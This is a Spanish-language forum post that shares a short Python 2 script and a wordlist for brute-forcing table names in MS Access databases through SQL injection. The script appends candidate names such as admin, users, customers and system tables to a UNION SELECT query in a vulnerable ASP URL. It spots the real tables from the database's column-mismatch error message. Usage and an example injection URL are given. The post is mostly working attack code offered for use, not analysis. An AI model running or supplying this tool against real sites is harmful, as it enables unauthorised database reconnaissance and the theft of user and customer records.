MSaccess Brute Force

@ed33x · Enero 30, 2011, 10:10:52 AM

Un simple rute force de MSaccess usando una lista de palabras predefinidas

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Código: python

import sys
import os
import urllib

from urllib import urlopen

os.system("cls")
print "Access Table Brute v1 Written by nova"
print "-------------------------------------"
print
print "Usage: access-brute.py url"
print "Eg. access-brute.py http://host.com/viewproduct.asp?id=1+union+select+1+From+\n"

url = sys.argv[1]
substring = "The number of columns in the two selected tables or queries of a union query do not match"

print url
print
print "Tables:\n"
print "-------"


f = open("tester.txt",'r')
for line in f:
        
        
        
        feeddata = urllib.urlopen(url+line).read()
              
        s = feeddata
        x = s.count(substring)
        if (x > 0):
            print line

print "-------------"
print "scan complete"

wordlist

Código: text

admin
users
customers
customer
members
clients
tblusers
tbluser
ordermain
orders
sales
stores
titles
msysobjects
MSysAccessObjects
MSysAccessXML
MSysACEs
MSysQueries
MSysRelationships
Northwind
wtblObjectList

MSaccess Brute Force

@ed33x

Enero 30, 2011, 10:10:52 AM Ultima modificación: Enero 18, 2013, 05:31:41 PM por 11Sep